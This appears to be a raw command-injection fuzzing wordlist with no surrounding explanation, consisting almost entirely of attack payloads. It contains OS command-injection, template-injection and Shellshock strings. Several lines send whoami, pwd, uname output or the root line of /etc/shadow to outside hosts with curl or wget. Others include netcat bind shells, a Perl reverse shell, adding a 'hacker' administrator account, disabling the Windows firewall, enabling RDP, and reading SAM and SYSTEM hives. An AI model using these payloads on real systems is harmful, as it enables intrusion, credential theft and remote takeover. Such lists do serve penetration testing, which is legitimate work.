|| whoami +" | whoami +" & whoami +" && whoami +"; whoami +$(`whoami`) +& whoami +&& whoami +{{ get_user_file("C:\boot.ini") }} +{{ get_user_file("/etc/hosts") }} +{{ get_user_file("/etc/passwd") }} +{{4+4}} +{{4+8}} +{{person.secret}} +{{person.name}} +{1} + {1} +{% For c in [1,2,3]%} {{c, c, c}} {% endfor%} +{{[] .__ Class __.__ base __.__ subclasses __ ()}} +` +|| +| +; +' +'" +" +"' +& +&& +%0a +%0a%0d +%0Acat%20/etc/passwd +%0Aid +%0a id %0a +%0Aid%0A +%0a ping -i 30 127.0.0.1 %0a +%0A/usr/bin/id +%0A/usr/bin/id%0A +%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 +%20{${phpinfo()}} +%20{${sleep(20)}} +%20{${sleep(3)}} +a|id| +a;id| +a;id; +a;id\n +() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`" +() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`" +() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`" +() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`" +() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`" +() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`" +() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5" +() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6" +() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1" +() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7" +() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3" +() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8" +() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9" +() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6" +() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`" +() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`" +() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`" +() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`" +() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`" +() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`" +() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4" +cat /etc/hosts +$(`cat /etc/passwd`) +cat /etc/passwd +() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12 +| curl http://crowdshield.com/.testing/rce.txt +& curl http://crowdshield.com/.testing/rce.txt +; curl https://crowdshield.com/.testing/rce_vuln.txt +&& curl https://crowdshield.com/.testing/rce_vuln.txt +curl https://crowdshield.com/.testing/rce_vuln.txt + curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt +curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt +$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) +dir +| dir +; dir +$(`dir`) +& dir +&&dir +&& dir +| dir C:\ +; dir C:\ +& dir C:\ +&& dir C:\ +dir C:\ +| dir C:\Documents and Settings\* +; dir C:\Documents and Settings\* +& dir C:\Documents and Settings\* +&& dir C:\Documents and Settings\* +dir C:\Documents and Settings\* +| dir C:\Users +; dir C:\Users +& dir C:\Users +&& dir C:\Users +dir C:\Users +;echo%20'' +echo ''// XXXXXXXXXXX +| echo "" > rfi.php +; echo "" > rfi.php +& echo "" > rfi.php +&& echo "" > rfi.php +echo "" > rfi.php +| echo "" > dir.php +; echo "" > dir.php +& echo "" > dir.php +&& echo "" > dir.php +echo "" > dir.php +| echo "" > cmd.php +; echo "" > cmd.php +& echo "" > cmd.php +&& echo "" > cmd.php +echo "" > cmd.php +;echo '' +echo ''// XXXXXXXXXXX +echo ''// XXXXXXXXXXX +| echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl +; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl +& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl +&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl +echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl +() { :;}; echo vulnerable 10 +eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') +eval('ls') +eval('pwd') +eval('pwd'); +eval('sleep 5') +eval('sleep 5'); +eval('whoami') +eval('whoami'); +exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') +exec('ls') +exec('pwd') +exec('pwd'); +exec('sleep 5') +exec('sleep 5'); +exec('whoami') +exec('whoami'); +;{$_GET["cmd"]} +`id` +|id +| id +;id +;id| +;id; +& id +&&id +;id\n +ifconfig +| ifconfig +; ifconfig +& ifconfig +&& ifconfig +/index.html|id| +ipconfig +| ipconfig /all +; ipconfig /all +& ipconfig /all +&& ipconfig /all +ipconfig /all +ls +$(`ls`) +| ls -l / +; ls -l / +& ls -l / +&& ls -l / +ls -l / +| ls -laR /etc +; ls -laR /etc +& ls -laR /etc +&& ls -laR /etc +| ls -laR /var/www +; ls -laR /var/www +& ls -laR /var/www +&& ls -laR /var/www +| ls -l /etc/ +; ls -l /etc/ +& ls -l /etc/ +&& ls -l /etc/ +ls -l /etc/ +ls -lh /etc/ +| ls -l /home/* +; ls -l /home/* +& ls -l /home/* +&& ls -l /home/* +ls -l /home/* +*; ls -lhtR /var/www/ +| ls -l /tmp +; ls -l /tmp +& ls -l /tmp +&& ls -l /tmp +ls -l /tmp +| ls -l /var/www/* +; ls -l /var/www/* +& ls -l /var/www/* +&& ls -l /var/www/* +ls -l /var/www/* + + + +\n +\n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\` +\n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\` +\n/bin/ls -al\n +| nc -lvvp 4444 -e /bin/sh| +; nc -lvvp 4444 -e /bin/sh; +& nc -lvvp 4444 -e /bin/sh& +&& nc -lvvp 4444 -e /bin/sh & +nc -lvvp 4444 -e /bin/sh +nc -lvvp 4445 -e /bin/sh & +nc -lvvp 4446 -e /bin/sh| +nc -lvvp 4447 -e /bin/sh; +nc -lvvp 4448 -e /bin/sh& +\necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n +\necho INJECTX\nexit\n\033[2Asleep 5\n +\necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n +| net localgroup Administrators hacker /ADD +; net localgroup Administrators hacker /ADD +& net localgroup Administrators hacker /ADD +&& net localgroup Administrators hacker /ADD +net localgroup Administrators hacker /ADD +| netsh firewall set opmode disable +; netsh firewall set opmode disable +& netsh firewall set opmode disable +&& netsh firewall set opmode disable +netsh firewall set opmode disable +netstat +;netstat -a; +| netstat -an +; netstat -an +& netstat -an +&& netstat -an +netstat -an +| net user hacker Password1 /ADD +; net user hacker Password1 /ADD +& net user hacker Password1 /ADD +&& net user hacker Password1 /ADD +net user hacker Password1 /ADD +| net view +; net view +& net view +&& net view +net view +\nid| +\nid; +\nid\n +\n/usr/bin/id\n +perl -e 'print "X"x1024' +|| perl -e 'print "X"x16096' +| perl -e 'print "X"x16096' +; perl -e 'print "X"x16096' +& perl -e 'print "X"x16096' +&& perl -e 'print "X"x16096' +perl -e 'print "X"x16384' +; perl -e 'print "X"x2048' +& perl -e 'print "X"x2048' +&& perl -e 'print "X"x2048' +perl -e 'print "X"x2048' +|| perl -e 'print "X"x4096' +| perl -e 'print "X"x4096' +; perl -e 'print "X"x4096' +& perl -e 'print "X"x4096' +&& perl -e 'print "X"x4096' +perl -e 'print "X"x4096' +|| perl -e 'print "X"x8096' +| perl -e 'print "X"x8096' +; perl -e 'print "X"x8096' +&& perl -e 'print "X"x8096' +perl -e 'print "X"x8192' +perl -e 'print "X"x81920' +|| phpinfo() +| phpinfo() + {${phpinfo()}} +;phpinfo() +;phpinfo();// +';phpinfo();// +{${phpinfo()}} +& phpinfo() +&& phpinfo() +phpinfo() +phpinfo(); + + + + + + + + +:phpversion(); +`ping 127.0.0.1` +& ping -i 30 127.0.0.1 & +& ping -n 30 127.0.0.1 & +;${@print(md5(RCEVulnerable))}; +${@print("RCEVulnerable")} +${@print(system($_SERVER['HTTP_USER_AGENT']))} +pwd +| pwd +; pwd +& pwd +&& pwd +\r +| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +\r\n +route +| sleep 1 +; sleep 1 +& sleep 1 +&& sleep 1 +sleep 1 +|| sleep 10 +| sleep 10 +; sleep 10 +{${sleep(10)}} +& sleep 10 +&& sleep 10 +sleep 10 +|| sleep 15 +| sleep 15 +; sleep 15 +& sleep 15 +&& sleep 15 + {${sleep(20)}} +{${sleep(20)}} + {${sleep(3)}} +{${sleep(3)}} +| sleep 5 +; sleep 5 +& sleep 5 +&& sleep 5 +sleep 5 + {${sleep(hexdec(dechex(20)))}} +{${sleep(hexdec(dechex(20)))}} +sysinfo +| sysinfo +; sysinfo +& sysinfo +&& sysinfo +;system('cat%20/etc/passwd') +system('cat C:\boot.ini'); +system('cat config.php'); +system('cat /etc/passwd'); +|| system('curl https://crowdshield.com/.testing/rce_vuln.txt'); +| system('curl https://crowdshield.com/.testing/rce_vuln.txt'); +; system('curl https://crowdshield.com/.testing/rce_vuln.txt'); +& system('curl https://crowdshield.com/.testing/rce_vuln.txt'); +&& system('curl https://crowdshield.com/.testing/rce_vuln.txt'); +system('curl https://crowdshield.com/.testing/rce_vuln.txt') +system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf') +system('curl https://xerosecurity.com/.testing/rce_vuln.txt'); +system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') +systeminfo +| systeminfo +; systeminfo +& systeminfo +&& systeminfo +system('ls') +system('pwd') +system('pwd'); +|| system('sleep 5'); +| system('sleep 5'); +; system('sleep 5'); +& system('sleep 5'); +&& system('sleep 5'); +system('sleep 5') +system('sleep 5'); +system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23') +system('wget https://xerosecurity.com/.testing/rce_vuln.txt'); +system('whoami') +system('whoami'); +test*; ls -lhtR /var/www/ +test* || perl -e 'print "X"x16096' +test* | perl -e 'print "X"x16096' +test* & perl -e 'print "X"x16096' +test* && perl -e 'print "X"x16096' +test*; perl -e 'print "X"x16096' +$(`type C:\boot.ini`) +&&type C:\\boot.ini +| type C:\Windows\repair\SAM +; type C:\Windows\repair\SAM +& type C:\Windows\repair\SAM +&& type C:\Windows\repair\SAM +type C:\Windows\repair\SAM +| type C:\Windows\repair\SYSTEM +; type C:\Windows\repair\SYSTEM +& type C:\Windows\repair\SYSTEM +&& type C:\Windows\repair\SYSTEM +type C:\Windows\repair\SYSTEM +| type C:\WINNT\repair\SAM +; type C:\WINNT\repair\SAM +& type C:\WINNT\repair\SAM +&& type C:\WINNT\repair\SAM +type C:\WINNT\repair\SAM +type C:\WINNT\repair\SYSTEM +| type %SYSTEMROOT%\repair\SAM +; type %SYSTEMROOT%\repair\SAM +& type %SYSTEMROOT%\repair\SAM +&& type %SYSTEMROOT%\repair\SAM +type %SYSTEMROOT%\repair\SAM +| type %SYSTEMROOT%\repair\SYSTEM +; type %SYSTEMROOT%\repair\SYSTEM +& type %SYSTEMROOT%\repair\SYSTEM +&& type %SYSTEMROOT%\repair\SYSTEM +type %SYSTEMROOT%\repair\SYSTEM +uname +;uname; +| uname -a +; uname -a +& uname -a +&& uname -a +uname -a +|/usr/bin/id +;|/usr/bin/id| +;/usr/bin/id| +$;/usr/bin/id +() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");' +() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11 +| wget http://crowdshield.com/.testing/rce.txt +& wget http://crowdshield.com/.testing/rce.txt +; wget https://crowdshield.com/.testing/rce_vuln.txt +$(`wget https://crowdshield.com/.testing/rce_vuln.txt`) +&& wget https://crowdshield.com/.testing/rce_vuln.txt +wget https://crowdshield.com/.testing/rce_vuln.txt +$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) +which curl +which gcc +which nc +which netcat +which perl +which python +which wget +whoami +| whoami +; whoami +' whoami +' || whoami +' & whoami +' && whoami +'; whoami +" whoami +" || whoami +" | whoami +" & whoami +" && whoami +"; whoami +$(`whoami`) +& whoami +&& whoami +{{ get_user_file("C:\boot.ini") }} +{{ get_user_file("/etc/hosts") }} +{{ get_user_file("/etc/passwd") }} +{{4+4}} +{{4+8}} +{{person.secret}} +{{person.name}} +{1} + {1} +{% For c in [1,2,3]%} {{c, c, c}} {% endfor%} +{{[] .__ Class __.__ base __.__ subclasses __ ()}} +;id\n +|usr/bin/id\n +|nid\n +`id` +`/usr/bin/id` +a);id +a;id +a);id; +a;id; +a);id| +a;id| +a)|id +a|id +a)|id; +a|id +|/bin/ls -al +a);/usr/bin/id +a;/usr/bin/id +a);/usr/bin/id; +a;/usr/bin/id; +a);/usr/bin/id| +a;/usr/bin/id| +a)|/usr/bin/id +a|/usr/bin/id +a)|/usr/bin/id; +a|/usr/bin/id +;system('cat%20/etc/passwd') +;system('id') +;system('/usr/bin/id') +%0Acat%20/etc/passwd +%0A/usr/bin/id +%0Aid +%0A/usr/bin/id%0A +%0Aid%0A +& ping -i 30 127.0.0.1 & +& ping -n 30 127.0.0.1 & +%0a ping -i 30 127.0.0.1 %0a +`ping 127.0.0.1` +| id +& id +; id +%0a id %0a +`id` +$;/usr/bin/id +echo%20AGIYMZ$((69%2B52))$(echo%20AGIYMZ)AGIYMZ +%20echo%20TDJHRY$((30%2B41))$(echo%20TDJHRY)TDJHRY +;echo%20MPCSBG$((54%2B42))$(echo%20MPCSBG)MPCSBG +&echo%20NWMZCF$((57%2B72))$(echo%20NWMZCF)NWMZCF +|echo%20TJEGSE$((27%2B57))$(echo%20TJEGSE)TJEGSE +||echo%20ANSBHE$((26%2B89))$(echo%20ANSBHE)ANSBHE +&&echo%20PVJXOS$((12%2B1))$(echo%20PVJXOS)PVJXOS +%0aecho%20VVIEOJ$((30%2B78))$(echo%20VVIEOJ)VVIEOJ +%3Becho%20SRPJET$((29%2B34))$(echo%20SRPJET)SRPJET +%26echo%20NQPWBV$((16%2B77))$(echo%20NQPWBV)NQPWBV +%26%26echo%20QOZRFB$((19%2B4))$(echo%20QOZRFB)QOZRFB +%7Cecho%20IRODNG$((26%2B68))$(echo%20IRODNG)IRODNG +%7C%7Cecho%20KRCSNE$((57%2B75))$(echo%20KRCSNE)KRCSNE +echo%20IFNPXI$((40%2B99))$(echo%20IFNPXI)IFNPXI' +%20echo%20HBFEEM$((46%2B2))$(echo%20HBFEEM)HBFEEM' +;echo%20KHMFRS$((69%2B67))$(echo%20KHMFRS)KHMFRS' +&echo%20DACXMN$((57%2B35))$(echo%20DACXMN)DACXMN' +|echo%20DDLJJW$((33%2B23))$(echo%20DDLJJW)DDLJJW' +||echo%20XIYAUA$((17%2B90))$(echo%20XIYAUA)XIYAUA' +&&echo%20CMMOTV$((30%2B10))$(echo%20CMMOTV)CMMOTV' +%0aecho%20VKWHEH$((83%2B36))$(echo%20VKWHEH)VKWHEH' +%3Becho%20RDKWWC$((22%2B44))$(echo%20RDKWWC)RDKWWC' +%26echo%20VOANQN$((77%2B86))$(echo%20VOANQN)VOANQN' +%26%26echo%20EXUMZL$((4%2B99))$(echo%20EXUMZL)EXUMZL' +%7Cecho%20VDZSYZ$((58%2B1))$(echo%20VDZSYZ)VDZSYZ' +%7C%7Cecho%20HYHREQ$((78%2B11))$(echo%20HYHREQ)HYHREQ' +echo%20GHWFXG$((12%2B72))$(echo%20GHWFXG)GHWFXG" +%20echo%20BAJXZZ$((73%2B7))$(echo%20BAJXZZ)BAJXZZ" +;echo%20YRBNTY$((83%2B14))$(echo%20YRBNTY)YRBNTY" +&echo%20WQLTXV$((0%2B25))$(echo%20WQLTXV)WQLTXV" +|echo%20PRCGGO$((57%2B79))$(echo%20PRCGGO)PRCGGO" +||echo%20RWZHCR$((74%2B28))$(echo%20RWZHCR)RWZHCR" +&&echo%20QTDSQL$((20%2B35))$(echo%20QTDSQL)QTDSQL" +%0aecho%20NCRQQT$((66%2B95))$(echo%20NCRQQT)NCRQQT" +%3Becho%20QXBWJP$((56%2B78))$(echo%20QXBWJP)QXBWJP" +%26echo%20YYWLTQ$((61%2B71))$(echo%20YYWLTQ)YYWLTQ" +%26%26echo%20XKFEGJ$((1%2B49))$(echo%20XKFEGJ)XKFEGJ" +%7Cecho%20YPOSVR$((24%2B62))$(echo%20YPOSVR)YPOSVR" +%7C%7Cecho%20CFGBVN$((38%2B88))$(echo%20CFGBVN)CFGBVN" +echo%20CWRXRJ$((77%2B13))$(echo%20CWRXRJ)CWRXRJ +%20echo%20IBQHOS$((92%2B76))$(echo%20IBQHOS)IBQHOS +;echo%20CSPAAF$((48%2B26))$(echo%20CSPAAF)CSPAAF +&echo%20DRUCFI$((69%2B56))$(echo%20DRUCFI)DRUCFI +|echo%20TWNZDU$((10%2B40))$(echo%20TWNZDU)TWNZDU +||echo%20TPIMPW$((11%2B13))$(echo%20TPIMPW)TPIMPW +&&echo%20FOJNEL$((64%2B8))$(echo%20FOJNEL)FOJNEL +%0aecho%20MBVQWK$((48%2B90))$(echo%20MBVQWK)MBVQWK +%3Becho%20RHJGKQ$((38%2B71))$(echo%20RHJGKQ)RHJGKQ +%26echo%20MUQJWT$((7%2B78))$(echo%20MUQJWT)MUQJWT +%26%26echo%20KHAVOV$((90%2B77))$(echo%20KHAVOV)KHAVOV +%7Cecho%20SUHDBU$((66%2B15))$(echo%20SUHDBU)SUHDBU +%7C%7Cecho%20FEGCUU$((21%2B29))$(echo%20FEGCUU)FEGCUU +echo%20DINEVC$((57%2B17))$(echo%20DINEVC)DINEVC// 